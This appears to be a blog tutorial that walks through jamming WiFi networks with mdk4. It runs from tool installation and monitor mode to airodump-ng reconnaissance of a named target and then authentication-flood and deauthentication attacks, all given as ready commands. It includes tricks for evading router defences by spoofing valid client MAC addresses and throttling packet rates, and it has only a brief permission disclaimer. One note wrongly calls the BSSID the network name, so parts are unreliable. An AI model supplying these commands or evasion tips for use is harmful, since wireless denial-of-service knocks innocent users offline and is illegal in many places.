One of the best and most powerful tools for Ethical hackers in WiFi
penetration testing is mdk4 because of it various options not make only it
feature-rich, it makes it way more dangerous too. I become speechless when I
explore the switch and the ability of the mdk4 tool. mdk3 and aireplay-ng are
very popular tools for WiFi jamming. And mdk4 is an advanced and feature-rich
version of mdk3 which is developed by ASPj of k2wrlz and E7mer of
360PegasusTeam.
Note: Great power comes with great responsibilities. So Don't do anything
stupid by using this tool which makes you in a trouble. Before performing any
kind of attack, make sure you have permission from the network owner.
⚪How to install mdk4 in Linux?
if you have knowledge of Linux package manager, Then It's easy to
install any software/package/tool in any Linux distro. But here we are
going to perform a WiFi jamming attack. So, we won't focus about the
Linux package manager, I am leaving the command to install the mdk4, aircrack-ng and wireless tools package in linux according to Linux distribution.
①. Install mdk4 in Debian based distro (Ubuntu, Kali, Parrot, PoP!_OS, Mx Linux, Zorin OS, Sparky Linux
etc...)
sudo apt install -y wireless-tools mdk4 aircrack-ng
②.
Install mdk4 in Arch based distro (Manjaro, ArcoLinux, EndeavourOS, Artix, Archlabs, Archman,
etc...)
sudo pacman --noconfirm -S aircrack-ng mdk4 wireless_tools
⚪How to enable monitor mode in Linux?
There are many methods to turn on monitor mode in our WiFi Network
adapter. And I am going to add one monitor mode interface to my WiFi
adapter.
sudo iw wlan0 interface add mon type monitor
where,
wlan0 is the name of my WiFi adapter interface, And mon is the name which I
want to add as a monitor mode in my WiFi adapter.
⚪How to capture wireless packets of wireless networks for a wireless attack?
There are many tools which allow us to dump wireless network packets/frames
which are travelling around us. We are going to use one of the most popular
tools named airodumo-ng. Airodump-ng have many options and switch which make
it unique from others tools. Here we are going to perform the wireless
jamming attack. So, we are not going into depth about it.
①.
capture all networks packets/frames
sudo airodump-ng [MON-INTERFACE]
i.e,
sudo airodump-ng mon
When we run this command our system will capture all of the data packets
which are transmitted around us. And We have to identify our target from
this attack. After identifying the target, we must have to note our target
BSSID, STATION, CHANNEL NUMBER, etc.. for our further attack.
Note: I am going to select NoobGajen as
my target network for this tutorial.
②.
capture target network packets/frames
From our first attack, we know our target wireless network BSSID, CHANNEL
NUMBER and much
more information which we need in our attack. So, we are going to put it
according to our needs. By using --bssid switch the tool will only
captured packets of specified wireless AP with the help of given
BSSID. This is very helpful to analyzing the activity of the target
network.
sudo airodump-ng [MON-INTERFACE] --bssid [BSSID]
Note: BSSID is the MAC address of the Wireless Network access point or WiFi
Network or any kind of wireless interface where the client/victim device is
currently connected. The full form of BSSID is Basic Service Set
Identifier.
i.e,
As we already know the BSSID of the network from the first scanning. And I
select NoobGajen as a target a network whose BSSID is 04:95:E6:98:6D:49
sudo airodump-ng mon --bssid 04:95:E6:98:6D:49
③. capture network packets/frames by channel
This tool also allows us to dump/capture/monitor wireless packets by its
channel.
sudo airodump-ng [INTERFACE] -c [channel_number]
i.e,
As we already our target wireless network is running on channel number 5.
So am going to put the channel number in place of [channel-number] in our
main command.
sudo airodump-ng mon -c 5
④.
save all the captured information
We can simply save our dumped/captured wireless packets by using switch "
-w <file name>" in airodump-ng. Only you have to replace <file
name> with your file name which you want to set.
sudo airodump-ng [MON-INTERFACE] -w <file name>
i.e,
sudo airodump-ng mon -w myfilename
where, mon is my [MON-INTERFACE] and myfilename is my <file
name>
Denial-Of-Service(DOS) attack is a malicious attack where the attacker
sends massive amount of traffic to the network or server access point that
the server can't able to handle that traffic and that particular network
or service goes down temporarily. In some cases, the service also gets
shut down for a long period of time because of a huge number of traffic
which cross the capacity to handle the traffic of that service. Here we
are going to perform a DOS attack on a wireless router network.
In this attack, we are going to use one of the most popular WiFi jamming
attack tools named mdk4. And we are going to use switch "a" which
generates randoms/fakes MAC addresses and sends authentication frames to
all APs found in a range of your WiFi adapter which freezes the entire
WiFi network temporarily.
sudo mdk4 [MON-INTERFACE] a
Note: This attack doesn't disconnect clients from the network But it turns
off the internet of the victim network by sending massive amounts of
traffic to the network.
i.e,
sudo mdk4 mon a
For this attack, we have to specify the target wireless network BSSID or
SSID. And you must be in the range of your target network to successes this
attack. Otherwise, the target network is still able to use the internet.
this method is the best method to turn off the internet connection of the
target network. Only the target network is unable to use the internet
Note: BSSID is simply the Wireless network name. The full form of SSID is
Service Set Identifier.
sudo mdk4 [MON-INTERFACE] a -a [BSSID]
i.e,
sudo mdk4 mon a -a 04:95:E6:98:6D:49
Some routers have a feature to differentiate between random/fake and
original mac addresses. And when they notice some fake mac addresses clients
want to connect with them. then they declined that addresses. if any chance
your attack got declined, Then you can bypass it by adding -m option.
Note: -m Send packets from valid client MAC addresses from the built-in OUI
database.
sudo mdk4 [INTERFACE] a -m
i.e,
sudo mdk4 mon a -m
Sometimes router is able to prevent our attack because they denied huge
number of packets in wireless AP but after applying -m option too (which
sends packets from valid client MAC addresses). Then, We can still bypass by
managing our packets speed from -s option.
Note: We must have to specify packets speed per second (PPS) while using -s
option. (Default: unlimited)
sudo mdk4 [INTERFACE] a -m -s [PPS]
i.e,
sudo mdk4 mon a -m -s 30
DeAuth attack is one type of Denial Of Service (DOS) attack which kicked out
the client/victim from the wireless network or WiFi access point. it is also
known as a Deauthentication attack on a wireless network. Now, it turns to
perform these attacks in the wireless network.
sudo mdk4 [INTERFACE] d
i.e,
sudo mdk4 mon d
mdk4 and mdk3 tools also provide features to DeAuth clients from wireless
APs by targeting wireless networks. You can also target that AP in whitelist
and blacklist mode which is really amazing. You can easily. If you feel hard
to copy and paste BSSID of your target network, then you can also make this
attack by using SSID of your network.
sudo mdk4 [INTERFACE] d -E [SSID]
i.e,
sudo mdk4 mon d -E "RADMI NOTE 10 PRO MAX"
If we preform DeAuth attack on a wireless network AP as a whitelist mode.
Then, only our target network clinets won't get declined and rest of the
network's clients will get declined.
sudo mdk4 [MON-INTERFACE] d -W [BSSID]
i.e,
sudo mdk4 mon d -W 04:95:E6:98:6D:49
If we preform DeAuth attack on a wireless network AP as a blacklist
mode. Then,only our target network clinets will get declined and rest of
the network's clients won't get declined.
sudo mdk4 [MON-INTERFACE] d -B [BSSID]
i.e,
sudo mdk4 mon d -B 04:95:E6:98:6D:49
mdk4 and mdk3 tools are also allow their users to preform DeAuth attack
on a multiple networks as a whitelist and blacklist mode at a same time.
To preform this attack we have to create one file and add our target
network's BSSID in that file. So, I am going to create my file from nano
text editor. and i will add my target BSSID in that file.
The name of my file will be wifi.txt and i am going to
add 04:95:E6:98:6D:49 and 88:B3:62:03:2A:F9
③.i) How to perform a DeAuth attack by targeting multiple wireless networks as a Whitelist mode?
If we preform DeAuth attack on a wireless network APs as a whitelist mode.
Then, only our target networks clinets won't get declined and rest of the
network's clients will get declined.
(05:45) To Jam all network by Whitelist mode which detect in your system
sudo mdk4 [MON-INTERFACE] d -w [file path]
i.e,
sudo mdk4 mon d -w wifi.txt
If we preform DeAuth attack on a wireless network APs as a blacklist mode.
Then,only our target networks clinets will get declined and rest of the
network's clients won't get declined.
sudo mdk4 [MON-INTERFACE] d -b [file path]
i.e,
sudo mdk4 mon d -b wifi.txt
we can easliy get our target channel number from airodump-ng from above
command. After knowing our target network channel number. We can easily
preform attack on channel number. and the respective wireless network which
are running in that specific channel number only get affected by this
attack.
sudo mdk4 [MON-INTERFACE] d -c [channel_number]
i.e,
sudo mdk4 mon d -c 5
Some of the routers denied our attack because we are sending them huge number
of DeAuth packets to the wireless AP. So, by customizing our packets speed. We
can bypass this protection.